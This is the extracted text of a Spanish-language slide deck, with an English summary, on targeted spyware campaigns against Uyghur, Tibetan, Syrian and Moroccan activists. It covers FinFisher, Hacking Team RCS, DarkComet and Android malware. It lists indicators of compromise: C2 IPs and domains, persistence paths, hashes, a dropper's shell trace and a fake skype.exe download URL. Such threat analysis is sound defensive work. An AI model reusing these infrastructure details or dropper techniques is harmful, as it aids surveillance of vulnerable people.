The document discusses several targeted malware attacks and surveillance techniques. It describes malware programs like FinFisher, DarkComet RAT, and Hacking Team's RCS that are used to monitor devices, steal files and communications, and enable remote control. It also mentions vulnerabilities exploited in Microsoft Word and Adobe Reader to install malware. Targets discussed include Uyghurs, Tibetans, and activists. Sources cited include CitizenLab.org, Kaspersky, and Symantec reports on commercial spyware vendors and their government clients.

1. Ataques dirigidos
a activistas
David Barroso
Telefonica Digital

2. Uyghur

3. Uyghur

4. Uyghurhttp://surveillance.rsf.org/es/

5. https://tails.boum.org

10. Uyghur

12. Source: CitizenLab.org

13. Source: CitizenLab.org

14. ddddddasdfsdf
 FinFisher – Gamma Group
 Instala un driver
 Modifica MBR
 Se inyecta en procesos legítimos
(winlogon.exe, svchost.exe)
 Packer & anti-debugging
 AES-256-CBC
 C2: 77.69.140.194 (Bahrain) Puertos: 22, 53,
80, 443, 4111

15. ddddddasdfsdf
 FinFisher – Gamma Group
Bypassing of 40 regularly tested Antivirus Systems
Covert Communication with Headquarters
Full Skype Monitoring (Calls, Chats, File Transfers, Video,
Contact List)
Recording of common communication like Email, Chats
and Voice-over-IP
Live Surveillance through Webcam and Microphone
Country Tracing of Target
Silent Extracting of Files from Hard-Disk
Process-based Key-logger for faster analysis
Live Remote Forensics on Target System
Advanced Filters to record only important information
Supports most common Operating Systems (Windows,
Mac OSX and Linux)

16. Source: Rapid7

17. Source: CitizenLab.org

18. ddddddasdfsdf
 FinFisher – Gamma Group
 iOS version: install_manager.app
 Instalación por ‘provisioning profile’ (necesario UDID)
 Certificado: Martin Muench (Managing Director)
 /System/Library/LaunchDaemons/com.apple.logind.plis
t
 ‘Dropea’ SyncData.app
 Roba contactos, SMS, histórico de llamadas,
geolocalización, etc.
 Base64
 Versiones para Android, Symbian, BlackBerry

19. Source: CitizenLab.org

20. Uyghur

21. ddddddasdfsdf
 Mamfakinch.com
Svp ne mentionnez pas mon nom ni rien du tout je ne
veux pas d embrouilles…
http://freeme.eu5.org/scandale%20(2).doc
Mamfakinch.com
 Hacking Team – RCS
 OSX.Crisis / W32.Crisis
 Fichero adobe.jar -> versión para mac y win32
 Win32: CurrentVersion/Run. Infección de procesos
 Infecta imágenes VMware

22. Source: Symantec

23. Source: Symantec

24. Uyghur

25. ddddddasdfsdf
Concerns over Uyghur People.doc
Hosh Hewer.doc
Jenwediki yighingha iltimas qilish Jediwili.doc
list.doc
Press Release on Commemorat the Day of Mourning.doc
The Universal Declaration of Human Rights and the
Unrecognized Population Groups.doc
Uyghur Political Prisoner.doc
2013-02-04 - Deported Uyghurs.doc
Jenwediki yighingha iltimas qilish Jediwili(Behtiyar
Omer).doc
Kadeer Logistics detail.doc

26. Source: Kaspersky

27. ddddddasdfsdf
 Vulnerabilidad Word para Mac CVE-2012-
0158
 Abre documento real y ejecuta binario
 Keylogger, información de la máquina, control
remoto
 LaunchDaemon ‘systm’
 Tiny Shell
 AES (12345678) y SHA1
 ‘me’ como contacto
 C2: update.googmail.org (207.204.245.192)

28. ddddddasdfsdf
1154/0x2610: fstat(0x26, 0xBFFF4CD0, 0x200) = 0 0
1154/0x2610: lseek(0x26, 0x6600, 0x0) = 26112 0
1154/0x2610: open("/tmp/l.sh0", 0x602, 0x1FF) = 40
0
1154/0x2610: open("/tmp/l0", 0x602, 0x1FF) = 41 0
1154/0x2610: open("/tmp/l.doc0", 0x602, 0x1FF) = 42
0
1154/0x2610: read(0x26, "#!/bin/bashnsleep 1n/usr/bin/open
/tmp/l.docncp /tmp/l /tmp/mn/tmp/m0", 0x44) = 68 0
1154/0x2610: write(0x28, "#!/bin/bashnsleep 1n/usr/bin/open
/tmp/l.docncp /tmp/l /tmp/mn/tmp/m0", 0x44) = 68 0
Source: AlienVault

30. Targeted Attacks
LURK/Gh0stRAT

31. Source: Citizelab.org

32. Targeted Attacks
Dalai Lama

33. Source: Kaspersky

34. Source: Kaspersky

35. ddddddasdfsdf
 Vulnerabilidad Word para Mac CVE-2012-
0158
 Abre documento real y ejecuta binario
 Keylogger, información de la máquina, control
remoto
 Binario firmado digitalmente
 C2: 61.178.77.76 TCP/1080

36. Source: Kaspersky

37. Source: Kaspersky

38. Source: Kaspersky

39. Targeted Attacks

40. Source: Symantec

41. Source: Symantec

42. Source: CitizenLab.org

43. ddddddasdfsdf
 Vulnerabilidad MSWORD CVE-2012-0158
 Abre documento real y ejecuta binario
 Keylogger, información de la máquina, control
remoto
 Binario firmado digitalmente
 C2: 114.142.147.51

44. ddddddasdfsdf
Metadata Original Dropped
MD5 8882c40ef1786efb
98ea251e247bfbee
40f41c077e03d72a
39eb1bd7bf6e3341
Last saved by HSwallow lebrale
Creation date Tue., Jun. 12
09:11:00 2012
Wed., Jun. 13
11:39:00 2012
Last save date Tue., Jun. 12
09:11:00 2012
Wed., Jun. 13
11:39:00 2012

45. Targeted Attacks

46. Source: CitizenLab.org

47. Source: CitizenLab.org

48. Source: CitizenLab.org

49. ddddddasdfsdf
 APT1 / GOGGLES vs GLASSES
 Aplicación simula ser carpeta
 Instala un PDF no malicioso (job posting en
Nepal), un binario spkptdhv.exe en %temp%
que se instala en el registro
 Comandos: sleep / download & run
GET /ewpindex.htm HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; Windows
NT 5.1; MSIE 7.0; Trident/4.0; Clj26Dbj.XYZ)
Host: ewplus.com
Cache-Control: no-cache

50. Android

51. Source: CitizenLab.org

52. ddddddasdfsdf
 Spoof en el From
 Tibetanos generalmente ‘rootean’ los Android
para instalar fuentes
 También instalan APK debido a restricciones
en Google Play
 Apps modificadas
 Intercepta SMS para dar posición
 Roba histórico de llamadas, SMS y contactos
 C2 android.uyghur.dnsd.me

53. Source: CitizenLab.org

54. Source: CitizenLab.org

55. Android

56. Source: Kaspersky

57. Source: Kaspersky

58. Source: Kaspersky

59. ddddddasdfsdf
 Robo de contactos, SMS, historial de
llamadas, datos del teléfono
 C2: Base64 a 64.78.161.133

60. Source: Kaspersky

61. Todo vale

62. Source: https://malwarelab.zendesk.com

68. http://unremote.org

69. ddddddasdfsdf
 Capture webcam activity
 Disable the notification setting for certain
antivirus programs
 Download and execute arbitrary programs
and commands
 Modify the hosts file
 Record key strokes
 Retrieve system information about the
computer
 Start or end processes
 Steal passwords
 Update itself

70. ddddddasdfsdf
 %Temp%dclogs[CURRENT DAY]-[RANDOM
NUMBER].dc
 %UserProfile%Start
MenuProgramsStartup(Empty).lnk

71. ddddddasdfsdf
 Autor: DarkCoderSc
 Fecha: 2008
 Versión actual: 5
 Lamenta lo ocurrido, y ofrece un
desinstalador

73. Ingenieria Social

74. Source: Trendmicro

75. Source: EFF

76. Source: EFF

77. Source: EFF

78. Source: EFF

79. Malware

80. Source: EFF

81. Source: EFF

82. ddddddasdfsdf
 DarkComet RAT
 C:Documents and
SettingsAdministratorStart
MenuProgramsStartup(Empty).lnk
 C:DOCUME~1ADMINI~1LOCALS~1Temp
.pdf
 C:DOCUME~1ADMINI~1LOCALS~1Temp
Explorer.exe
 C:DOCUME~1ADMINI~1LOCALS~1Temp
msdlg.ocx
 C:DOCUME~1ADMINI~1LOCALS~1Temp
dclogs

83. Source: EFF

84. ddddddasdfsdf
 [] Aleppo Team
 [] Aleppo Team
rar
 [29/05/2012 18:03:44] Aleppo Team | | ...: Last
modified plan Aleppo time for Jihad
 [29/05/2012 18:03:46] Aleppo Team | | ...:
Send the file "plan eventually 2.rar"

85. Source: EFF

86. Source: EFF

87. Source: EFF

88. ddddddasdfsdf
 C:Documents and
SettingsAdministratorStartMenuProgramsS
tartup(empty).lnk
 C:DOCUME~1ADMINI~1LOCALS~1Temp
explorer.exe
 C:DOCUME~1ADMINI~1LOCALS~1Temp
Aleppo plan.pdf
 C:DOCUME~1ADMINI~1LOCALS~1Temp
Firefox.dll

89. Skype encryption

90. Source: EFF

91. Source: EFF

92. Source: EFF

93. ddddddasdfsdf
 DarkComet RAT
 http://skype-encryption.sytes.net/
 http://216.6.0.28/SkypeEncryption/Dow
nload/skype.exe

94. Antihacker

95. 73%
Source: EFF

96. Source: EFF

97. Source: EFF

98. Source: EFF

99. Source: EFF

100. Source: EFF

101. ddddddasdfsdf
 DarkComet RAT
 Se conecta a 216.6.0.28/google.exe
 Keylogger:
C:DOCUME~1ADMINI~1LOCALS~1
Tempdclogs.sys
 C:Documents and
SettingsAdministratorStart
MenuProgramsStartup..lnk

102. BlackShades

103. 73%
Source: EFF
http://bshades.eu/bsscmds.php

104. ddddddasdfsdf
With Blackshades Remote Controller you can:
- Control several computers at once, performing tasks
ranging from viewing their screens to
uploading/downloading files from them
- Perform maintenance on a Network
- Help a client out by using the screen capture feature,
even if they are on the other side of the world
- Monitor a specific PC, recording the keystrokes and
remotely managing the files
- Access your computer that you have at home if you are
on holiday
- Monitor the computers of students and their activity while
teaching a computing lesson
- Chat with clients that you are connected to

105. ddddddasdfsdf
 Cuentas comprometidas Skype
 Fichero .PIF
 ‘Windows Messanger’ – Alta en
firewall, Startup
 C2: alosh66.myftp.org (31.9.170.140)
4444/TCP

108. ddddddasdfsdf
 OSX.Kitm (Kumar in the mac)
 Rajinder Kumar
 OSX/Filesteal – OSX/HackBack
Source: F-Secure

109. Source: F-Secure

111. Source: F-Secure

112. Source: F-Secure

113. Source: F-Secure

114. Gracias
David Barroso
@lostinsecurity